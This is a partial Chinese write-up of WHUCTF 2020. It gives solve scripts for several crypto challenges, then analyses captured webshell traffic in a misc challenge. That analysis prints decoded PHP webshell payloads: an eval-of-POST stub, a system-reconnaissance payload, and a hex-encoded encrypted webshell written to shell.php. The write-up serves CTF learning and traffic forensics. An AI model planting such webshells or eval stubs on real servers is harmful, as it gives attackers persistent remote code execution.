2020_WHUCTF_Writeup（部分）

0x1 crypto

bvibvi

首先要通過驗證問題，對一個等式計算求解，簡單的枚舉求解即可。
通過驗證過後，需要回答一系列問題，是關於B站BV號和AV號的。
題目給出BV號，讓我們找出對應的AV號。多組正確後再給AV號，讓我們找出BV號。
簡單的瞭解了下Bilibili的av號和bv號知識後，發現

av號對應url格式爲 url =‘https://www.bilibili.com/video/av’+aid
bv號爲 url =‘https://www.bilibili.com/video/’+bid

若手工一一查找太麻煩，另外程序也有時間限制，因此需要採取自動化辦法獲取av和bv對應關係。
可通過在網頁源碼查看對應的BV和AV，利用python re模塊進行提取即可。

解題腳本

from pwn import *
import requests
r = remote('218.197.154.9' ,'16387')

context(log_level='debug')
print(string.printable)
def work():
    r.recvuntil('Math:\n')
    d1 =r.recvuntil(' *')[:-2]
    
    r.recvuntil('+ ')
    d2 = r.recvuntil(' ')
    r.recvuntil('== ')
    d3 = r.recvuntil(' ')
    r.recvuntil('mod ')
    d4 = r.recvuntil('\n')[:-1]
    d1,d2,d3,d4 = int(d1),int(d2),int(d3),int(d4)
    #print(int(d1),d2,d3,d4)
    for x in range(d4):
        if (d1*x+d2) % d4 == d3:
            print(x)
            r.sendlineafter('x :',str(x))
def bv():
    i=5
    while i:
        i=i-1
        aid = r.recvuntil('\n')[:-1]
        url ='https://www.bilibili.com/video/av'+aid
        q = requests.get(url)
        res = re.findall(r'"videoData":{"bvid":"(.*)","aid":(.*),"videos"',q.text)
        print(res[0][0])
        r.sendline(res[0][0])

def av():
    sleep(1)
    i=15
    while i:
        i=i-1
        bid = r.recvuntil('\n')[:-1]
        url ='https://www.bilibili.com/video/'+bid
        q = requests.get(url)
        res = re.findall(r'"videoData":{"bvid":"(.*)","aid":(.*),"videos"',q.text)
        #print(res[0][1])
        r.sendline(res[0][1])


work()
r.recvuntil('id.\n')
bv()
r.recvuntil('number.\n')
av()

print(r.recvall())

notrsa

關於rsa的題目。
題目給了p q e c，但其中p不是素數，因此需要進一步對p分解，否則直接解密會出錯。
藉助yafu分解p

所有相當於RSA模數有三個素因子，利用歐拉定理得到
phi = (p1-1)*(p2-1)*(q-1)
於是可求出私鑰d=invert(e,phi)
明文 flag = pow(c,d,p*q)

腳本

#!/usr/bin/env python

from Crypto.Util.number import *
import gmpy2
p = 0x501431403e46f960310474f59accb2cb
q = 0xb0b378d96238e799a2e544e7686f8d17
e = 0x10001
c = 0x9b941cce29810d1026e0005c1bd20f4234f7f210edd3ed369cdd3ff7b34c188


p1 = 10215054443853430669
p2 = 10420217054443542967

phi = (p1-1)*(p2-1)*(q-1)
d = gmpy2.invert(e,phi)
m = pow(c,d,(p*q))
print(m)
print(long_to_bytes(m))

aes

cbc模式加密。加密方式如下

def aes_pad(s):
    t = bytes((AES_KEYSIZE - len(s) % AES_KEYSIZE) * chr(AES_KEYSIZE - len(s) % AES_KEYSIZE),
              encoding='utf-8')
    return s + t


def enc():
    f = open('plaintext', 'r')
    plaintext = f.readlines()
    f.close()
    f = open('ciphertext', 'w')
    for i in range(len(IV)):
        aes = AES.new(key, AES.MODE_CBC, IV[i])
        m = aes_pad(base64.b64decode(plaintext[i]))
        cipher = aes.encrypt(m)
        print(bytes.decode(base64.b64encode(cipher)), file=f)
    f.close()

本題密鑰已知，密文已知，但初始化IV未知。

AES算法的IV長度爲16字節，暴力破解是不現實的。

cbc模式解密模式如下。在第二組密文解密時並不受到IV值影響，只需要有key和前一組密文即可。

所以可以獲取到每行明文的第二個數塊以及之後的數據塊。

編寫腳本嘗試解密，看是否有發現

import string

def unpad(s):
    t=0
    #print((s[-1]))
    return s[:-s[-1]]

def dec():
    f = open('ciphertext', 'r')
    cipher = f.readlines()
    f.close()
    f = open('plaintext1', 'w')
    flag=''
    for i in range(len(cipher)):
        ci = (base64.b64decode(cipher[i]))
        iv=b'\x00'*16    #iv可以任意
        aes = AES.new(key, AES.MODE_CBC,iv)
        #m = aes.decrypt(ci[16:]+ci[:16])
        m = aes.decrypt(ci)
        #print(m)
        m=unpad(m)
        #print(m,len(m))
        flag+=chr(m[-1])

        #print(base64.b64encode(m), file=f)
    print(flag[::-1])
    #print(''.join(flag))
    f.close()

dec()

仔細觀察解密後的數據，發現每行最後一個字節是明文，組合起來便是flag。出題人太會玩了。
需要注意解密後要進行unpad操作才能能得到原始m。

prism

這道題涉及到了RSA密碼問題、離散對數密碼問題。加密計算過程雖然複雜，但做題思路很清晰。
加密腳本

def enc(keys, m):
    p, g, y = keys[-1]
    while True:
        k = getRandomInteger(2048)
        if gmpy2.gcd(k, p-1) == 1:
            break
    c1 = pow(g, k, p)
    m = (getRandomInteger(64) << m.bit_length()) + m
    m = ((m << 64) + getRandomInteger(64))
    c2 = pow(y, k, p) * m % p
    return c1, c2

密鑰來源

from Crypto.Util.number import getPrime, getRandomInteger, long_to_bytes, bytes_to_long
from Crypto.Cipher import AES
from Crypto.Util import Counter
import gmpy2

from secret import rsa_keygen


def FFF(food, key):    #aesjiami
    K = 0xe238c70fe2d1885a1b12debfa15484cab8af04675c39ff4c633d6177f234ed88
    key = long_to_bytes(key, 32)
    food = long_to_bytes(food, 128)
    aes = AES.new(key, AES.MODE_CTR, counter=Counter.new(128, initial_value=K))
    c = bytes_to_long(aes.encrypt(food))
    return c
    

def GGG(food, key):
    K = 0xfd94d8de73e4aa8f4f452782b98a7870e82ec92a9db606fe4ca41f32d6df90c5
    K = long_to_bytes(K, 32)
    food = long_to_bytes(food, 128)
    aes = AES.new(K, AES.MODE_CTR, counter=Counter.new(128, initial_value=key))
    c = bytes_to_long(aes.encrypt(food))
    return c
    

def keygen():
    keys = []
    
    n0, e0 = rsa_keygen()
    keys.append([n0, e0])
    N0, E0 = n0, e0
    
    while True:
        p1 = getPrime(1024 // 2)
        e1 = pow(p1, E0, N0)
        q1 = getPrime(1024 // 2)
        n1 = p1 * q1
        phi1 = (p1-1)*(q1-1)
        if e1 < n1 and gmpy2.gcd(e1, phi1) == 1:
            break
    keys.append([n1, e1])
    N1, E1 = n1, e1

    K2 = 0xb6a022cd2fb960d4b6caa601a0412918fd80656b76c782fa6fe9cf50ef205ffb
    B2_1 = 8
    B2_2 = 8
    B2_3 = 1024
    while True:
        p2 = getPrime(2048 // 2)
        i = 0
        while True:
            p2_1 = FFF(p2, K2 + i)    #aes encrypt,i not known  (0,8)
            if p2_1 < N1:
                break
            i += 1
            if i >= B2_1:
                break
        if i >= B2_1:
            continue
        p2_2 = pow(p2_1, E1, N1)
        j = 0
        while True:
            p2_3 = GGG(p2_2, K2 + j)
            x2 = (p2_3 << 1024) + getRandomInteger(1024)
            q2 = gmpy2.next_prime(x2 // p2)
            n2 = p2 * q2
            if 0 <= (n2 >> 1024) - p2_3 < B2_3:
                break
            j += 1
            if j >= B2_2:
                break
        if i <= B2_1 and j < B2_2:
            break
    e2 = 65537
    keys.append([n2, e2])
    N2, E2 = n2, e2

    K3 = 0xfcec710a0313bb8f93e76e00ae6862b9be72dfd837db3b64ddde344bebfd2f50
    B3_1 = 8
    B3_2 = 1024
    while True:
        x3 = gmpy2.next_prime(getRandomInteger(2048) % N2)
        if x3 >= N2:
            continue
        x3_2 = pow(x3, E2, N2)
        i = 0
        while True:
            f3 = FFF(x3_2, K3 + i)
            p3 = gmpy2.next_prime(f3)
            if p3 > x3 and p3 - f3 < B3_2:
                break
            i += 1
            if i >= B3_1:
                break
        if i < B3_1:
            break
    while True:
        g3 = gmpy2.next_prime(getRandomInteger(p3.bit_length()) % p3)
        if g3 < p3 and 1 == gmpy2.gcd(g3, p3-1):
            break
    y3 = pow(g3, x3, p3)
    keys.append((p3, g3, y3))
    P3, G3, Y3 = p3, g3, y3

    B4 = 16384
    while True:
        x4 = gmpy2.next_prime(getRandomInteger(2048) % P3)
        k = getPrime(2048)
        if x4 >= P3 or gmpy2.gcd(k, P3-1) > 1:
            continue
        b4 = pow(Y3, k, P3) * x4 % P3
        p4 = gmpy2.next_prime(b4)
        g4 = pow(G3, k, P3)
        if gmpy2.is_prime(p4) and x4 < p4 and g4 < p4 and p4 - b4 < B4:
            break
    y4 = pow(g4, x4, p4)
    keys.append([p4, g4, y4])
    
    return keys

會產生5組公鑰(n0,e0) (n1,e1) (n2,e2) (p3,g3,y3) (p4,g4,y4)以及一組密文(c1,c2)，並將這些信息發送給我們

其中除n0 e0外，每組公鑰可由上組公鑰推導而得。明文加密方式如下

c1=g4^k % p4
c2=m*y4^k % p4
y4=g4^x4 % p4

所以明文可通過如下方式計算

m=c2*((c1^-1)^x4) % p4

所以需要先解出x4。而x4產生方式如下

while True:
        x4 = gmpy2.next_prime(getRandomInteger(2048) % P3)
        k = getPrime(2048)
        if x4 >= P3 or gmpy2.gcd(k, P3-1) > 1:
            continue
        b4 = pow(Y3, k, P3) * x4 % P3
        p4 = gmpy2.next_prime(b4)
        g4 = pow(G3, k, P3)
        if gmpy2.is_prime(p4) and x4 < p4 and g4 < p4 and p4 - b4 < B4:
            break
y4 = pow(g4, x4, p4)

直接對x4暴力破解不現實，發現x4與b4 g4 x3以及p3有關，可以仿照上面推導出x4的計算公式：

x4=b4*(g4^-1)^x3%p3

b4有範圍限制，可以枚舉。x3需要繼續分析。x3產生方式

    while True:
        x3 = gmpy2.next_prime(getRandomInteger(2048) % N2)
        if x3 >= N2:
            continue
        x3_2 = pow(x3, E2, N2)
        i = 0
        while True:
            f3 = FFF(x3_2, K3 + i)
            p3 = gmpy2.next_prime(f3)
            if p3 > x3 and p3 - f3 < B3_2:
                break
            i += 1
            if i >= B3_1:
                break
        if i < B3_1:
            break
    while True:
        g3 = gmpy2.next_prime(getRandomInteger(p3.bit_length()) % p3)
        if g3 < p3 and 1 == gmpy2.gcd(g3, p3-1):
            break
    y3 = pow(g3, x3, p3)

所以x3可以通過如下方式計算得到：

x3=(x32^d2) %n2

其中d2表示公鑰n2 e2的私鑰。經過分析，d2又需要有d1，d1又需要d0，所以分析n0和e0

發現n0 可被分解

之後的思路爲：

獲取(e0， n0)的私鑰d0 ==> 利用d0獲取d1 ==> 枚舉獲取p2 ==>分解n2 ==> 獲取d2 ==>枚舉x32 > 求x3> x4 ==>m

其中，獲取p2的代碼如下

K2 = 0xb6a022cd2fb960d4b6caa601a0412918fd80656b76c782fa6fe9cf50ef205ffb
p23=0
p2_set = set()
for p23 in range((n2>>1024)-1024,n2>>1024):      #p23有範圍限制

    for j in range(8):
        p22=GGG(p23,K2+j)      #GGG算法逆向使用
        p21 = pow(gmpy2.mpz(p22),d1,gmpy2.mpz(n1))
        if p21 >= n1:
            continue
        #p2_1 = FFF(p2, K2 + i)
        
        for i in range(8):
            p2 = FFF(p21,K2)       #解出一個p2
            if gmpy2.is_prime(p2):
                #print('find p2 ==>',p2)
                p2_set.add(p2)      
print('p2 have ' ,len(p2_set))    #查看有多少個p2

解出後p2只有一個，很順利。利用p2可以分解n2，得到私鑰d2.

腳本

from pwn import *
import random
import string
import hashlib
import gmpy2
from Crypto.Util.number import getPrime, getRandomInteger, long_to_bytes, bytes_to_long
from Crypto.Cipher import AES
from Crypto.Util import Counter
r = remote('218.197.154.9' ,'16384')

#context(log_level='debug')
print(len(string.letters+ string.digits))
def work():
    way = r.recvuntil('XX')
    r.recvuntil('X+')
    suf = r.recv(12)
    r.recvuntil('== ')
    t = r.recvuntil('\n')[:-1]
    print(way,suf,t)
    flag = 1 
    cnt=0
    for a in string.letters+string.digits:
        for b in string.letters+string.digits:
            for c in string.letters+string.digits:
                #for d in string.letters+string.digits:
                r_str=a+b+c
                s=''
                if  b'384' in way :
                    s = hashlib.sha384(r_str+suf).hexdigest()
                elif b'224'in way :
                    s = hashlib.sha224(r_str+suf).hexdigest()
                elif b'512' in way: 
                    s = hashlib.sha512(r_str+suf).hexdigest()
                elif b'1(' in way:
                    s = hashlib.sha1(r_str+suf).hexdigest()
                elif b'md5' in way:
                    s = hashlib.md5(r_str+suf).hexdigest()
                elif b'256' in way:
                    s = hashlib.sha256(r_str+suf).hexdigest()

                #cnt+=1
                if s==t:
                    print(r_str)
                    r.sendlineafter('X:',r_str)

                    return
    print(b"not find.")
    print(cnt)

rep = 20
#while rep:

rep-=1
work()

r.interactive()



def FFF(food, key):    #解密函數
    K = 0xe238c70fe2d1885a1b12debfa15484cab8af04675c39ff4c633d6177f234ed88
    key = long_to_bytes(key, 32)
    food = long_to_bytes(food, 128)
    aes = AES.new(key, AES.MODE_CTR, counter=Counter.new(128, initial_value=K))
    c = bytes_to_long(aes.decrypt(food))   #此處有改動
    return c
    

def GGG(food, key):
    K = 0xfd94d8de73e4aa8f4f452782b98a7870e82ec92a9db606fe4ca41f32d6df90c5
    K = long_to_bytes(K, 32)
    food = long_to_bytes(food, 128)
    aes = AES.new(K, AES.MODE_CTR, counter=Counter.new(128, initial_value=key))
    c = bytes_to_long(aes.decrypt(food))
    return c


n0,e0=0xb84adda1b748a0b596553a247ead86b9a40ce4e4997934298bb50a6612d814bbb79110cff31e4502fc16ed44ffdf2d17ff26ced2dea129f9551aa6cd1df846fcab14eb83a277908fb5aab41df8414aad8a47b2d1b8beacf71936016025568098dae90b00bcd83463c07c36a86a94cd6ccfe93d2313a2caca2c225906fe6ad153,    0x10001 

n1,e1=0x9907d857e498cc826a4a1728527f0902b4de4fede6f1b63248ff4d6418a27c090a6b9590e9bcce0fe4cf3bba2e8055fb5642110f423c47857c57dec3be5716017a39d747e5a0f06724bcac55ce16206ab423a8451d8788dd4e49de24f84a147f620796304fb5dd468d7c63cbfc6559d89230415c6438c61877448762b844cf0d,    0x8f49de1bffa2ae1cf66b5d4ff15fd9bff1875ac623c7e886a369c6897cbe4211379b9f9028ec3275aa19210eecda8d32a67c2d0efdb963d84d3f7b7ca451bf17cda3b2958b514a9a1603892d1c95ee637e7840acb2774203fdd17cd268bdbb05b6f7f6aff79ca242276bf4f3dc1df415b26b10d79b5519173f8a0eed170738f7
n2,e2=0x9f5865fa8a117a9bdc42e7a2244e95fb51f2eab88d8a576b8a1fbb7449bb7aacd4019cbce97caf31cd40527d87f805029758251661819187b4f2bf0a25cb30ce7c7efbed09492c2f405d053e17f57dc988c2ee8134dc3970c0b1152c9f8e83e67410db109e16cc998a7e4cb8649aab34642310cbc38a6cf158a831702a79f75c4202382a2e944a7024349584ba902bc2f27a3dbce3bb677bec7fa271c35ca01a6226a261c74967d5e9236dd8ff671e031bfadd2a93410d7d098b5d016825fd5e8b3e94e3b763e6b0c8f26f93715dc34cb304f6fb1a981bc9681bc41f34090e226dee5b4c43c9cb599d5560f3958a047a6bf7f6777d4e5c7166188adfb27d1999,    0x10001
p3,g3,y3=0xde3b23a6529e415ebde6e399d805d09db4fbe901d6474f31a9365c671061d667acc7c7b492fa1f5e0451a57b720fd225c7aaa30b6040d2733be88ec313f53941b36037af743418e3d2c7d7c5d66ba5af123720012b2a6419931759a65e7c1b3491190a9edc92c3407d6b29e4ffab5169d2790f233d6e1dc7b97b2a1aea2d67d8b00e8bbb8e0bd615786dd3c3415bf581b52b57ca1fd0165c084023bedd7dc0a349aeb4baaeac02e62abecd4a7bfcd3711211ed1054a05f109025171dcf08d23f30ec6adb7589beeccde79bbf411d42801fad187305a23f3a697fcb16ad496c021a67a869eda67ec10e8e41671498c24891956cb23645020d6a735a3667eb8177,    0x955a7ed5ea9d6eae35d3d4251c53b95cd6e598fb295bff66dc728ca6681b24ba22cde2dc9d77d705f66cea666ad5c1674564550bc95d36ab4376586a2ed2e13879a32af04e14fd66cda97f256348e353046863836b6519da30b7bd8803022ed36c27eb28e6248666f77be321b52a2b85470853334ee5aedcf1bc908bdc26b104fbed3365d501d97e6c7fd0244065f9fd4c12baac0575d094cf299f2c9ddf18cb48f34abc1a9a82c728095707e84ce8d96eb3850d842036261340b5a935c1e6fb4e37572b143c51add5865157d158c0cf0b02725b8324eb8bfcd531bbfda9ad6106c37f3c053b12184c5dc398c592ff66de173d1f381173b06417645e1105ce6b,    0x83e7fda14bb16aebd80a36740b2c03df580cd5727cf4e2c63ff6addd09c12a521a6c7e50ac920b85df3de7ba18d67ff2e6b06daafb5a0ec24d9283e1f479cbc768b51db4db29f088b4cf22fa7d71685b0626f355bcfba1d7da4e13e3eae744e67f157a3d596c76e1f1375c72b53bed3ef95ce5c4e96d6d7fbfbb23e38b0d02d903c23e4546c3e3966b1ca2154b629bfe6878487056a4bf8ce45b2152243160cadbd56030a96a8f3362b6e1d6a2d19633594cf94fb5ca486853e063ba7d2130f17aa48a28b12ddb704cd507c6e56c3f939c23ee153f0eed384d077499ad1345b6b129178de86e814a4159b0e70d5196f4e2c5d8105f531ca709eedf84cd49ed29
p4,g4,y4=0xb8f5795e804f128ded00e772176d3bc5e55e1017caf143025a0bdafc942e8bc2667f45adb357cf693fab149a0dc9153615eb99ee18b56d9e0322ba060a875d3651a52c976165b839b2b2bffbbddd428e0aa5ceccf458c9df6db9106bcb4358784042b70abe79863fac561c527451659db03fb70b1546101363e92258d772306aa910d2c6f6c6a3178f46352f094aad444b04b32f2664540a48261bb2a6cb537544f16faef666957eee42a4886b3bfbbe993cffbcb621cfca3a14138423066e66edb72599201a8662e6bb105797ad3706a17ece8e548fe0ae558f79595e7c8af40e3fb52301042b2a1ad9cd43a986217bcec5c4339556678135ff3790508fdbb3,    0x5eb3827294398409424cf1c736c51b53fe017ca60f6e444c05c3e01745fb95cea4e696ef015fc4d3575ae32debc22b52778910e5f34da76eee2d9189cb03a632594048983d8c6290b4d246ca30be8f1ed0cd39ec52f591ae328282f8f952e0a774843c4c16644bd230e92d2d2c93f7b49c44d152ff379a69fadebc64566c662d9e5dc3a785208695c784be220dce9550eca9f4b263cd3913d0d2542caa106d0abe81862fb42db822f5a4a34a60a9e5ae72e142cd268e7e15260b4e2070babc21f625d5b6268235988159b75d2e411f00c9d991f43b45b6fe3a0a559612f59657e3a46d99e8e63a8a321e04f08d4ee4d2165f9278e159321c6ad41eb75b4e4778,    0xadef460a7fa8624d5b17ce6d1728a30d87b82520570ddf3fb143ea2d821e0f2a90bab97e2a4106d19d46c069278d637d4908098f3aca1b242a95fb593635e93cc494723da53b618f82950c25d6a5b6b67bbd60e607bc419b144e242b68cfa92ec6b6e1b1ce1cf2e1a32da5d7b3472bf66a9d9c4da19a62c0cecc78025348c5d630154c62d4769ff131cb9f5a48cec3a0a6fdd63ee8b405601d55b4210eb40b5b5d7e5aa64ef2bbf3cc5780e0778c4543a4975901ff82e744309a24f54d8b67c69257a011684048619293a637c2876a1aa7c926daac9576dafe10f2f4c1eccc7c5eb30687de07547bb31f3d4f1902ee7ab6f04c290db832bf0c461bc

c1 = 0x3d9dab4e4c169dfd48be9d3650da187d2595b12f527eae743abb083324544f8da0ade68de38f0b158a640368a69b7394705ea2b6d111ed2ae910e00e1210420dd716512e18c51683004e15339db3e419423fc54e214f72058681629d54bf5efaf2fdd331730ebf26fbc94770e7909bd885882c328c019945ea5436a24efe44fd6b6d06c912da992a182bff097927f7966afecb531da8279d08870a6b080283eb8e63c8308da60800e066a64e15e024e8258e1c6712af7600e66ce848a22705cf5be6e19ddf7bbe6ad589563be0bcff8b73292ee34fea6f748cefce0048b1708830905a25b880192f267ea25b419b8b266ba0503fe7fa7b50214e4efbfdfdaeaf
c2 = 0x97f954f603c56e99c77d7d8d18a163db27f8435644a205b5044a83d3600514a4f0588bb0a88fec6655c2c5e7780ab4a30e7aefffb8e4bfd6f001e59e708b1d409c49d4d52ab3c671d3e11b09a73bd73e619352146e528f3e77263e3583621a9e2241b7975cfa4c408da590b97db2dcd293a8fda2453c55c1efbfdb908da2ba9b42c3bd43847165f916d6ac19501f2f2a85c16fc4ef7e8ff4c874bbf6b3e72c21739185b6a151542638e5f3371159b93e9f754ee55e18d95f458c58137b6f57c9308b6bf1af70294388d9be8a275e4ade0c8351ef5f9928a89a22362e173a994271a9a7258a57f08b752da77aad19a728eed465332404070e53fe33666fc99755

p0 = 11006133303590551631675246859575351810710583902045010025752215760816709528885667614498739120484094845160818739241825899293229144099950082437132149513603493
q0 = 11758403418512875451309984803241692202897478510504889589465663580602420645325301125824700469191331308536224777852310675971125980830369323328662266246532503

assert p0*q0==n0

d0 = gmpy2.invert(e0,(p0-1)*(q0-1))
assert e0*d0 % ((p0-1)*(q0-1))==1

p1 = pow(e1,d0,n0)
q1 = n1/p1
d1 = gmpy2.invert(e1,(p1-1)*(q1-1))
assert e1*d1 % ((p1-1)*(q1-1))==1


K2 = 0xb6a022cd2fb960d4b6caa601a0412918fd80656b76c782fa6fe9cf50ef205ffb
p23=0
p2_set = set()
for p23 in range((n2>>1024)-1024,n2>>1024):

    for j in range(8):
        p22=GGG(p23,K2+j)
        p21 = pow(gmpy2.mpz(p22),d1,gmpy2.mpz(n1))
        if p21 >= n1:
            continue
        #p2_1 = FFF(p2, K2 + i)
        
        for i in range(8):
            p2 = FFF(p21,K2)
            if gmpy2.is_prime(p2):
                #print('find p2 ==>',p2)
                p2_set.add(p2)
print('p2 have ' ,len(p2_set))


for p in p2_set:
    if n2%p ==0:
        print('p2 ok.',p)
        q2 = n2/p
        p2=p

p2=122109180030288460505683106516758782997285419169818400276015278767487227502627559884637244048387709095094085353481244746384211468117813749070701994950874097862232228201819215579246882153864430895188246868916255125015214683068299260597051889802156084553739100164754837994083720674019411856695367256656411936773
q2 = n2/p2

d2 = gmpy2.invert(e2,(p2-1)*(q2-1))
assert e2*d2 % ((p2-1)*(q2-1))==1


K3 = 0xfcec710a0313bb8f93e76e00ae6862b9be72dfd837db3b64ddde344bebfd2f50
x3_set = set()
for f3 in range(p3-1024,p3):

    for j in range(8):
        x32 = FFF(f3,K3+j)
        x3 = pow(x32,d2,n2)
        if x3< n2 and x3<p3 and gmpy2.is_prime(x3) and pow(g3,x3,p3)==y3:
            print('find x3',x3)
            x3_set.add(x3)
print('x3 have ' ,len(x3_set))
x3=10883650120811820927059825205656925674877413389339940317606532035764509107004511025515412942673431139304232681926944723286699034521210405597867636120477240583401604904272661598054670244261437958351827625829003741471228898260053523424613167287478494707174151486705521431299811803032944592912434334762420625192013041990777716770095407637642717697040655148694006377469714117314562054428114201248056181219160146332275497478114807008806266418227975366322851686496519853290123435333983250748352548880879919319074989904938656924865656805238578365299255738395935294592983165567340664328533240350609782034945692885212482088993
for b4 in range(p4-16384,p4):

    x4 = pow(gmpy2.invert(g4,p3),x3,p3)*b4%p3
    
    m = c2*pow(gmpy2.invert(c1,p4),x4,p4) %p4
    if 'CTF' in long_to_bytes(m):
        print(m,long_to_bytes(m))

運行即可得到flag

0x2 misc

checkin

簽到題，下載文件後查看文件內容發現與github有關，flag地址 https://github.com/xinyongpeng/whuctfflag/blob/master/flag.txt

shellofawd

這道題模擬了與webshell交互的過程。
給了一個流量包，用wireshark分析。
查看其中http協議，發現第一個post包，如下

base64解碼後

>>> import base64
>>> s='ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtfMHg2YWE0MDFhZDNjNTM3XSkpO2RpZSgpOw%3D%3D'
>>> s='ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtfMHg2YWE0MDFhZDNjNTM3XSkpO2RpZSgpOw=='
>>> base64.b64decode(s)
'eval(base64_decode($_POST[_0x6aa401ad3c537]));die();'
>>> t='QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuICRvdXQ7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiMmUwZWJlYTU1OTIiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gIjYyZTgwMGEwIjt9b2Jfc3RhcnQoKTt0cnl7JEQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pO2lmKCREPT0iIikkRD1kaXJuYW1lKCRfU0VSVkVSWyJQQVRIX1RSQU5TTEFURUQiXSk7JFI9InskRH0JIjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJDIiwiWiIpYXMgJEwpaWYoaXNfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO31lbHNleyRSLj0iLyI7fSRSLj0iCSI7JHU9KGZ1bmN0aW9uX2V4aXN0cygicG9zaXhfZ2V0ZWdpZCIpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6IiI7JHM9KCR1KT8kdVsibmFtZSJdOkBnZXRfY3VycmVudF91c2VyKCk7JFIuPXBocF91bmFtZSgpOyRSLj0iCXskc30iO2VjaG8gJFI7O31jYXRjaChFeGNlcHRpb24gJGUpe2VjaG8gIkVSUk9SOi8vIi4kZS0%2BZ2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs='
>>> base64.b64decode(t)
'@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "2e0ebea5592";echo @asenc($output);echo "62e800a0";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="\t";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="\t{$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e-6\x05\x9d\x95\xd15\x95\xcd\xcd\x85\x9d\x94\xa0\xa4\xed\xf4\xed\x85\xcd\xbd\xd5\xd1\xc1\xd5\xd0\xa0\xa4\xed\x91\xa5\x94\xa0\xa4\xec'

ant參數會執行_0x6aa401ad3c537變量內容，該參數此處執行了查看文件路徑以及系統信息的命令。繼續往下分析。

第二個post數據包也是類似的結構特點

_0xcd5e022894314=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuICRvdXQ7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiMTdkYzIzIjtlY2hvIEBhc2VuYygkb3V0cHV0KTtlY2hvICJmODkwMzU1ZDNjIjt9b2Jfc3RhcnQoKTt0cnl7JGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbImo2YjM2ZjUxNmQxYWRmIl0pOyRjPSRfUE9TVFsib2M4NjgzMWY3OWVjNzIiXTskYz1zdHJfcmVwbGFjZSgiDSIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCIKIiwiIiwkYyk7JGJ1Zj0iIjtmb3IoJGk9MDskaTxzdHJsZW4oJGMpOyRpKz0yKSRidWYuPXVybGRlY29kZSgiJSIuc3Vic3RyKCRjLCRpLDIpKTtlY2hvKEBmd3JpdGUoZm9wZW4oJGYsImEiKSwkYnVmKT8iMSI6IjAiKTs7fWNhdGNoKEV4Y2VwdGlvbiAkZSl7ZWNobyAiRVJST1I6Ly8iLiRlLT5nZXRNZXNzYWdlKCk7fTthc291dHB1dCgpO2RpZSgpOw%3D%3D&ant=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtfMHhjZDVlMDIyODk0MzE0XSkpO2RpZSgpOw%3D%3D&j6b36f516d1adf=L3Zhci93d3cvaHRtbC9zaGVsbC5waHA%3D&oc86831f79ec72=3C3F7068700D0A406572726F725F7265706F7274696E672830293B0D0A73657373696F6E5F737461727428293B0D0A69662028697373657428245F4745545B2770617373275D29290D0A7B0D0A20202020246B65793D737562737472286D643528756E697169642872616E64282929292C3136293B0D0A20202020245F53455353494F4E5B276B275D3D246B65793B0D0A202020207072696E7420246B65793B0D0A7D0D0A656C73650D0A7B0D0A20202020246B65793D245F53455353494F4E5B276B275D3B0D0A0924706F73743D66696C655F6765745F636F6E74656E747328227068703A2F2F696E70757422293B0D0A0969662821657874656E73696F6E5F6C6F6164656428276F70656E73736C2729290D0A097B0D0A090924743D226261736536345F222E226465636F6465223B0D0A090924706F73743D24742824706F73742E2222293B0D0A09090D0A0909666F722824693D303B24693C7374726C656E2824706F7374293B24692B2B29207B0D0A202020200909092024706F73745B24695D203D2024706F73745B24695D5E246B65795B24692B312631355D3B200D0A202020200909097D0D0A097D0D0A09656C73650D0A097B0D0A090924706F73743D6F70656E73736C5F646563727970742824706F73742C2022414553313238222C20246B6579293B0D0A097D0D0A20202020246172723D6578706C6F646528277C272C24706F7374293B0D0A202020202466756E633D246172725B305D3B0D0A2020202024706172616D733D246172725B315D3B0D0A09636C61737320437B7075626C69632066756E6374696F6E205F5F636F6E73747275637428247029207B6576616C2824702E2222293B7D7D0D0A09406E657720432824706172616D73293B0D0A7D0D0A3F3E

第三個post數據包

解碼後，代碼如下

<?ini_set("display_errors", "0");@set_time_limit(0);
function asenc($out){return $out;};
function asoutput(){$output=ob_get_contents();
    ob_end_clean();
    echo "17dc23";echo @asenc($output);echo "f890355d3c";
}ob_start();
try{
    $f=base64_decode($_POST["j6b36f516d1adf"]);  //data=/var/www/html/shell.php
    $c=$_POST["oc86831f79ec72"];
    $c=str_replace("\r","",$c);
    $c=str_replace("\n","",$c);
    $buf="";
    for($i=0;$i<strlen($c);$i+=2)
        $buf.=urldecode("%".substr($c,$i,2));
    echo(@fwrite(fopen($f,"a"),$buf)?"1":"0");;
}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();?>

發現作用是寫入了一個shell.php文件
